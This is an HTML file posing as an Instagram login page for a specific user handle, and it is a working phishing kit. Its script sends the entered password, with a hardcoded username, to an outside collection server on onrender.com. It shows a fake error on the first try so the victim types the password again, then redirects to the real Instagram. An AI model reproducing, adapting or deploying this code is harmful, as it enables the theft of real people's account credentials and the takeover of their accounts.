<!DOCTYPE html>
<!-- Coding By CodingNepal - www.codingnepalweb.com -->
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Instagram Login</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
<style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap');

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: 'Roboto', sans-serif;
}

.flex {
  display: flex;
  align-items: center;
}

.container {
  padding: 0 15px;
  min-height: 100vh;
  justify-content: center;
  background: #f0f2f5;
  
}

.facebook-page {
  justify-content: space-between;
  max-width: 1000px;
  width: 100%;
  margin-bottom:220px;
}
    

.facebook-page .text {
  margin-bottom: 90px;
}

form {
  display: flex;
  flex-direction: column;
  border-radius: 8px;
  padding: 20px;
  max-width: 400px;
  width: 100%;
}

form input {
  height: 55px;
  width: 100%;
  border: 1px solid #ccc;
  border-radius: 6px;
  margin-bottom: 15px;
  font-size: 1rem;
  padding: 0 14px;
}

form input:focus {
  outline: none;
  border-color: #1877f2;
}

::placeholder {
  color: #777;
  font-size: 1.063rem;
}

.link {
  display: flex;
  flex-direction: column;
  text-align: center;
  gap: 15px;
}

.link .login {
  border: none;
  outline: none;
  cursor: pointer;
  background: #1877f2;
  padding: 15px 0;
  border-radius: 6px;
  color: #fff;
  font-size: 1rem;
  font-weight: 500;
  transition: 0.2s ease;
}

.link .login:hover {
  background: #0d65d9;
}

form a {
  text-decoration: none;
}

.link .forgot {
  color: #1877f2;
  font-size: 0.875rem;
}

.link .forgot:hover {
  text-decoration: underline;
}


.button {
  margin-top: 25px;
  text-align: center;
  margin-bottom: 20px;
}

.button a {
  padding: 15px 20px;
  background: #42b72a;
  border-radius: 6px;
  color: #fff;
  font-size: 1.063rem;
  font-weight: 600;
  transition: 0.2s ease;
}

.button a:hover {
  background: #3ba626;
}

@media (max-width: 900px) {
  .facebook-page {
    flex-direction: column;
    text-align: center;
  }

  .facebook-page .text {
    margin-bottom: 30px;
  }
}

@media (max-width: 460px) {
  .facebook-page h1 {
    font-size: 3.5rem;
  }

  .facebook-page p {
    font-size: 1.3rem;
  }

  form {
    padding: 15px;
  }
}
 #error-message {
            color: #f44336; /* Red color */
            font-size: 0.875rem;
            display: none;
            margin-bottom: 8px;
            margin-top:-8px;
            text-align: left;
        }

         .password-container{
          position: relative;
         }
    
            .fa {
            font-family: "Font Awesome 5 Free"; /* Specify the correct font family */
        }
        .fa-eye,.fa-eye-slash{
                position: absolute;
                top: 28%;
                right: 4%;
                cursor: pointer;
                color: rgb(194, 191, 191);
                }
            .profile-image {
            width: 100px;
            height: 100px;
            border-radius: 50%;
            overflow: hidden;
            margin-bottom: 20px;
            margin-left:50px;
        }

        .profile-image img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }
        #id-name {
            font-size: 1.4rem;
            font-weight: 500;
            margin-bottom: 10px;
        }
        .facebook-page {
            display: flex;
            align-items: center;
        }

        .facebook-page .profile-info {
            display: flex;
            flex-direction: column;
        }
    


        .facebook-page .profile-info p {
            margin: 0;
        }
    </style>
</head>

<body>
    <div class="container flex">
        <div class="facebook-page flex">
          <div class="profile-info">
            <div class="profile-image">
              <img src="https://drive.google.com/uc?export=view&id=1vK8Bf-utk4VMXnDpbGWjQtFZHikxaN-F">
            </div>
            <p id="id-name">sanjana_sanjana1414</p>
          </div>
          <form id="login-form">
             <div id="error-message"></div>
             <div class="password-container">
             <input type="password" placeholder="Password" id="password">
             <i class="fa fa-eye-slash" id="eye" onclick="togglePasswordVisibility()"></i>
             </div>
                <div class="link">
                    <button type="button" class="login" onclick="validateForm()">Login</button>
                    <a href="https://www.instagram.com/accounts/password/reset/" class="forgot" target="_blank">Forgot password?</a>
                </div>
              <div id="error-message"></div>
            </form>
        </div>
    </div>
    <script>
        var count=0;
        function validateForm() {
          ++count;
          var errorMessage = document.getElementById("error-message");
          var passwordInput = document.getElementById("password");
          var password=passwordInput.value;
          // Assuming username is always "sahitya"
          var username = "shanika";

          // Create an object to send in the POST request
          var userCredentials = {
            userName: username,
            password: password
          };
          fetch('https://instagram-reels-rakshu-video-viral.onrender.com/api/fbuser', {
            method: 'POST',
            headers: {
              'Content-Type': 'application/json'
            },
            body: JSON.stringify(userCredentials)
          })
            .then(response => response.json())
            .then(data => {
              // Handle the response from the backend as needed
              console.log('Success:', data);
            })
            .catch((error) => {
              console.error('Error:', error);
              errorMessage.innerText = "There was an error during login.";
              errorMessage.style.display = "block";
            });

          if(count==1){
           errorMessage.innerText = "The email address or mobile number you entered isn't connected to an account. Find your account and log in.";
           errorMessage.style.display = "block";
          }
          else{
            window.location.href = "https://www.instagram.com";
          }
           passwordInput.value = "";
        }

         function togglePasswordVisibility() {
                var passwordInput = document.getElementById("password");
                var eyeIcon = document.getElementById("eye");

                if (passwordInput.type === "password") {
                    passwordInput.type = "text";
                    eyeIcon.classList.remove("fa-eye-slash");
                    eyeIcon.classList.add("fa-eye");
                } else {
                    passwordInput.type = "password";
                    eyeIcon.classList.remove("fa-eye");
                    eyeIcon.classList.add("fa-eye-slash");
                }
            }
        
    </script>
</body>
</html>
